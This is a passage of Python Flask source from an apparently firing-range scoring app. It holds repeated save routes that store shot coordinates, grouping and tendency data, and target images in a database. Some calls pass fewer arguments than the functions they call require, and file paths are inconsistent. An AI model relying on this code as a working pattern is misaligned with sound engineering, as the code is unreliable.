datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_1'))
@app.route('/save_2/', methods=['GET', 'POST'])
def save_call_2():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_2()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_2(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_1'))
@app.route('/save_3/', methods=['GET', 'POST'])
def save_call_3():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_3()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_3(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_1'))
@app.route('/save_4/', methods=['GET', 'POST'])
def save_call_4():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_4()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_4(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_1'))
@app.route('/save_5/', methods=['GET', 'POST'])
def save_call_5():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_5()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_5(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_5'))
@app.route('/save_6/', methods=['GET', 'POST'])
def save_call_6():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_6()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_6(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_5'))
@app.route('/save_7/', methods=['GET', 'POST'])
def save_call_7():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_7()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_7(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_5'))
@app.route('/save_8/', methods=['GET', 'POST'])
def save_call_8():
final_x_1=[]
final_y_1=[]
x_list=None
y_list=None
tend_f_x_t = None
tend_f_y_t = None
if request.method == 'POST':
firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_8()
t1= session.get('tmpi_2',None)
f_mpix_1 = t1[ : 1 ]
f_mpiy_1=t1[ : 0 ]
final_x_1 = session.get('x2', None)
final_y_1 = session.get('y2', None)
gp_1_f=session.get('gp_u_2', None)
res_u_1=session.get('res_u_2',None)
tend_f = session.get('tf_u_2', None)
tend_f_x = session.get('tfirer_x2', None)
tend_f_y = session.get('tfirer_y2', None)
tend_f_x_1 = session.get('tfirer_x1_f', None)
tend_f_y_1 = session.get('tfirer_y1_f', None)
if (x==0):
x=0
y=0
else:
x_len=len(x)
y_len=len(y)
x_ss=x[1:x_len-1]
y_ss=y[1:y_len-1]
x_split = x_ss.split(",")
y_split = y_ss.split(",")
x_list=[]
y_list=[]
for x_t in x_split:
x_list.append(float(x_t))
for y_t in y_split:
y_list.append(float(y_t))
print(x_list,file=sys.stderr)
box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1)
gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1)
image_save=save_image_8(firer_id)
image = image_record(
date=time.strftime("%x"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
firer_id=firer_id,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
image_name=image_save
)
db.session.add(image)
db.session.commit()
return redirect(url_for('previous_page_target_5'))
def savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,final_x,final_y):
try:
print("Save in DB",file=sys.stderr)
print("--------------",file=sys.stderr)
print(final_x,file=sys.stderr)
if(final_x is None):
print("if",file=sys.stderr)
i = 0
while i <len(x):
print(x[i],file=sys.stderr)
detail=T_Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=x[i],
y=y[i],
final_x=x[i],
final_y=y[i]
)
db.session.add(detail)
db.session.commit()
tdetail=Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=x[i],
y=y[i],
final_x=x[i],
final_y=y[i]
)
db.session.add(tdetail)
db.session.commit()
i=i+1
else:
print("x",file=sys.stderr)
print(x,file=sys.stderr)
if (x is None):
f_x ,f_y = making_array_null(x,y , len(final_x))
i = 0
while i < len(final_x):
detail1=T_Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=f_x[i],
y=f_y[i],
final_x=final_x[i][0],
final_y=final_y[i][0]
)
db.session.add(detail1)
db.session.commit()
tdetail1=Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=f_x[i],
y=f_y[i],
final_x=final_x[i][0],
final_y=final_y[i][0]
)
db.session.add(tdetail1)
db.session.commit()
i=i+1
else:
if(len(final_x)<len(x)):
f_x_f=[]
f_y_f=[]
f_x_f ,f_y_f = making_array_del(final_x, final_y , len(x))
z = 0
while z <len(x):
detail1=T_Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=x[z],
y=y[z],
final_x=f_x_f[z],
final_y=f_y_f[z]
)
db.session.add(detail1)
db.session.commit()
tdetail1=Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=x[z],
y=y[z],
final_x=f_x_f[z],
final_y=f_y_f[z]
)
db.session.add(tdetail1)
db.session.commit()
z=z+1
elif(len(x)<len(final_x)):
firer_x=[]
firer_y=[]
firer_x,firer_y =making_array_add(x,y ,len(final_x))
z=0
f_x_f1=[]
f_y_f1=[]
for h in range(len(final_x)):
f_x_f1.append(final_x[h][0])
f_y_f1.append(final_y[h][0])
while z <len(f_y_f1):
detail2=T_Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=firer_x[z],
y=firer_y[z],
final_x=f_x_f1[z],
final_y=f_y_f1[z]
)
db.session.add(detail2)
db.session.commit()
tdetail2=Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=firer_x[z],
y=firer_y[z],
final_x=f_x_f1[z],
final_y=f_y_f1[z]
)
db.session.add(tdetail2)
db.session.commit()
z=z+1
else:
z=0
f_x_f1=[]
f_y_f1=[]
for h in range(len(final_x)):
f_x_f1.append(final_x[h][0])
f_y_f1.append(final_y[h][0])
print(type(f_x_f1),f_x_f1[0],file=sys.stderr)
while z <len(x):
detail3=T_Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=x[z],
y=y[z],
final_x=int(f_x_f1[z]),
final_y=int(f_y_f1[z])
)
db.session.add(detail3)
db.session.commit()
tdetail3=Firer_Details(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_id=detail_no,
target_no=target_no,
set_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
x=x[z],
y=y[z],
final_x=int(f_x_f1[z]),
final_y=int(f_y_f1[z])
)
db.session.add(tdetail3)
db.session.commit()
z=z+1
except Exception as e:
return redirect(url_for('error_6'))
return True
def making_array_null(x,y,l):
x1=[]
y1=[]
i=0
for i in range(l):
x1.append(-1)
y1.append(-1)
return x1 , y1
def save_image_1(firer_id):
srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/1.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
#srcfile = '/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/static/img_dump/1.png'
#dstdir = '/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/static/image_db/'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "1.png")
#old_file = os.path.join('/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/static/image_db/', "1.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
#new_file = os.path.join("/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/static/image_db/", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_2(firer_id):
srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/2.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "2.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_3(firer_id):
srcfile = 'E:/FRAS_production/static/img_dump/3.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "3.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_4(firer_id):
srcfile = 'E:/FRAS_production/static/img_dump/4.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "4.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_5(firer_id):
srcfile = 'E:/FRAS_production/static/img_dump/5.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "5.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_6(firer_id):
srcfile = 'E:/FRAS_production/static/img_dump/6.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "6.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_7(firer_id):
srcfile = 'E:/FRAS_production/static/img_dump/7.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "7.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def save_image_8(firer_id):
srcfile = 'E:/FRAS_production/static/img_dump/8.png'
dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
shutil.copy(srcfile, dstdir)
old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "8.png")
newfilename=""
newfilename+=str(firer_id)
newfilename+="_"
newfilename+=time.strftime("%Y_%m_%d_%H_%M")
newfilename+=".png"
new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
os.rename(old_file, new_file)
return newfilename
def savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1,f):
try:
print("this is tend_f_x",file=sys.stderr)
print(tend_f_x_1,file=sys.stderr)
if(firt_x==0):
mpi= MPI (
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_no=detail_no,
target_no=target_no,
spell_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
mpi_x=-1,
mpi_y=-1,
f_mpi_x=tend_f_x_1,
f_mpi_y=tend_f_y_1,
tendency=-1,
tendency_f=int(tend_f),
tendency_text=tend_f_x,
tendency_code=tend_f_y
)
db.session.add(mpi)
db.session.commit()
else:
if(tend_f_x_1 is None):
mpi= MPI (
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_no=detail_no,
target_no=target_no,
spell_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
mpi_x=firt_x[0],
mpi_y=firt_y[0],
f_mpi_x=firt_x[0],
f_mpi_y=firt_y[0],
tendency=int(tendency),
tendency_f=int(tendency),
tendency_text=f,
tendency_code=f
)
db.session.add(mpi)
db.session.commit()
else:
mpi= MPI (
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_no=detail_no,
target_no=target_no,
spell_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
mpi_x=firt_x[0],
mpi_y=firt_y[0],
f_mpi_x=tend_f_x_1,
f_mpi_y=tend_f_y_1,
tendency=tendency,
tendency_f=int(tend_f),
tendency_text=tend_f_x,
tendency_code=tend_f_y
)
db.session.add(mpi)
db.session.commit()
except Exception as e:
return redirect(url_for('error_6'))
return True
def savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,gp_l,gp_f,result,result_p):
try:
print("gp_l",file=sys.stderr)
print(gp_l,file=sys.stderr)
if (gp_l==""):
gp=Grouping(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_no=detail_no,
target_no=target_no,
spell_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
grouping_length=-1,
grouping_length_f=gp_f,
result = result
)
db.session.add(gp)
db.session.commit()
else:
if(gp_f is None):
gp=Grouping(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_no=detail_no,
target_no=target_no,
spell_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
grouping_length=gp_l,
grouping_length_f=gp_l,
result = result_p
)
db.session.add(gp)
db.session.commit()
else:
gp=Grouping(
date=time.strftime("%Y-%m-%d"),
datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
session_id=session_id,
detail_no=detail_no,
target_no=target_no,
spell_no=set_no,
paper_ref=paper_no,
firer_id=firer_id,
grouping_length=gp_l,
grouping_length_f=gp_f,
result = result
)
db.session.add(gp)
db.session.commit()
except Exception as e:
return redirect(url_for('error_6'))
return True
@app.errorhandler(500)
def internal_error(error):
return render_template('errors/500.html'), 500
@app.errorhandler(404)
def not_found_error(error):
return render_template('errors/404.html'), 404
@app.route('/duplicate_firer_error/')
def duplicate_firer_error():
return render_template('errors/duplicate.html')
@app.route('/paper_duplicate/')
def paper_duplicate_error():
return render_template('errors/paper_dup.html')
@app.route('/error_duplicate/')
def error_duplicate():
return render_template('errors/error_duplicate.html')
@app.route('/error/')
def error():
return render_template('errors/error_505.html')
@app.route('/error_2/')
def error_2():
return render_template('errors/error2_505.html')
@app.route('/error_102/')
def error_102():
return render_template('errors/error_102.html')
@app.route('/error_31/')
def error_31():
return render_template('errors/error31.html')
@app.route('/error_target_1/')
def error_target_1():
return render_template('errors/error_target_1.html')
@app.route('/error_3/')
def error_3():
return render_template('errors/error3_505.html')
@app.route('/error_4/')
def error_4():
return render_template('errors/error4_505.html')
@app.route('/error_5/')
def error_5():
return render_template('errors/error5_505.html')
@app.route('/error_6/')
def error_6():
return render_template('errors/error6_505.html')
@app.route('/error_7/')
def error_7():
return render_template('errors/error7_505.html')
def making_array_del(x , y , l):
x_f=[]
y_f=[]
for i in range(len(x)):
x_f.append(x[i][0])
y_f.append(y[i][0])
for j in range(l-len(x)):
x_f.append(-1)
y_f.append(-1)
return x_f , y_f
def making_array_add(x , y , l):
x_1=[]
y_1=[]
for i in range(len(x)):
x_1.append(x[i])
y_1.append(y[i])
for j in range(l-len(x)):
x_1.append(-1)
y_1.append(-1)
return x_1 , y_1
def firing_tendancy(origin_x, origin_y , x, y):
print("x,y",file=sys.stderr)
print(x,y,file=sys.stderr)
x1 = origin_x-x
y1 = origin_y-y
xfirt=None
yfirt=None
deg = 0
h = math.sqrt(x1**2 + y1**2)
x_dis = x-origin_x
y_dis = y-origin_y
theta = math.degrees(y_dis/h)
if( x_dis > 0 and y_dis < 0 ):
deg = 360 - theta
xfirt=pixeltoinch(x_dis)
yfirt=pixeltoinch(y_dis)
elif (x_dis < 0 and y_dis < 0 ):
deg = 270 - theta
xfirt=pixeltoinch(x_dis)
yfirt=pixeltoinch(y_dis)
elif(x_dis < 0 and y_dis > 0 ):
deg = 180 - theta
xfirt=pixeltoinch(x_dis)
yfirt=pixeltoinch(y_dis)
else :
deg = theta
xfirt=pixeltoinch(x_dis)
yfirt=pixeltoinch(y_dis)
print("Sending xfirt....", file=sys.stderr)
print(xfirt, file=sys.stderr)
print(yfirt, file=sys.stderr)
return (np.round(deg,0) ,xfirt ,yfirt )
def getfiringtendencytext(f1 ,firt_x,firt_y):
print("Receiving xfirt....", file=sys.stderr)
print(firt_x, file=sys.stderr)
print(firt_y, file=sys.stderr)
fttext=""
ftcode=""
t1=""
t2=""
t1code=""
t2code=""
isbullseye=False
if(abs(firt_x)<=4.5 and abs(firt_y)<=4.5):
isbullseye=True
if firt_x >=0 and firt_y >=0:
t1="Top"
t2="Right"
t1code="T"
t2code="R"
elif firt_x <0 and firt_y >=0:
t1="Top"
t2="Left"
